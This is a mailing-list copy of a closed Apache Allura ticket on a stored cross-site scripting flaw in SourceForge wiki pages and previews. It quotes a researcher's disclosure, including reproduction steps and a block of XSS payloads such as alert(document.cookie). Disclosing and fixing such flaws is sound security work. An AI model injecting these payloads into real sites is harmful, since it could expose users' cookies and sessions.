[allura:tickets] #7528 XSS on wiki page and preview

Mon, 05 Jan 2015 14:18:03 -0800 


---

** [tickets:#7528] XSS on wiki page and preview**

**Status:** closed
**Milestone:** asf_release_1.2.0
**Labels:** security p1 sf-2 
**Created:** Thu Jul 03, 2014 12:31 PM UTC by Chris Tsai
**Last Updated:** Mon Jan 05, 2015 12:03 AM UTC
**Owner:** Dave Brondsema

Confirmed and reproduced here: 
https://sourceforge.net/p/strawhat/private-wiki/Swapnil_XSS/

***This also affects live wiki pages, not just the previews***

Original message from user,  Swapnil Thaware:

>Respected Authorities,

>My name is Swapnil A. Thaware and I am a Security Researcher from India. I 
>have found security vulnerability in​ sourceforge.net. Here I am giving the 
>details of the vulnerability found in sourceforge.net.


>Vulnerability : Stored XSS

>Vulnerability Description : Cross-Site Scripting (XSS) attacks are a type of 
>injection, in which malicious scripts are injected into otherwise benign and 
>trusted web sites. XSS attacks occur when an attacker uses a web application 
>to send malicious code, generally in the form of a browser side script, to a 
>different end user. Flaws that allow these attacks to succeed are quite 
>widespread and occur anywhere a web application uses input from a user within 
>the output it generates without validating or encoding it.

>An attacker can use XSS to send a malicious script to an unsuspecting user. 
>The end user’s browser has no way to know that the script should not be 
>trusted, and will execute the script. Because it thinks the script came from a 
>trusted source, the malicious script can access any cookies, session tokens, 
>or other sensitive information retained by the browser and used with that 
>site. These scripts can even rewrite the content of the HTML page.

>Step to Reproduce :
1) Login to Account
2) Goto wiki Section then Click on Create Page
3) Write a name
4) and then put XSS Payload in Content box then click on Preview button.
5) Boooommmm !! we get the popup

>XSS Payload : 

~~~~
<body onLoad=confirm(0)> "><svg/onload=alert(document.cookie)> ">"<img src=x 
onerror=prompt(document.domain)>"> "><ScRiPt>alert("Hami Hax")<%2FScRiPt> 
"><img src=x onerror=prompt('Xss');> “><img src=x 
onerror=alert(document.cookie)> 
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
 
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
 ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
~~~~


>POC : I added a screenshot in attachment, please kindly check the attachment.


>Kindly let me know when the vulnerability is fixed and I am eligible for any 
>acknowledgement or any reward.​


---

Sent from forge-allura.apache.org because [email protected] is subscribed 
to https://forge-allura.apache.org/p/allura/tickets/

To unsubscribe from further messages, a project admin can change settings at 
https://forge-allura.apache.org/p/allura/admin/tickets/options.  Or, if this is 
a mailing list, you can unsubscribe from the mailing list.





















					Reply via email to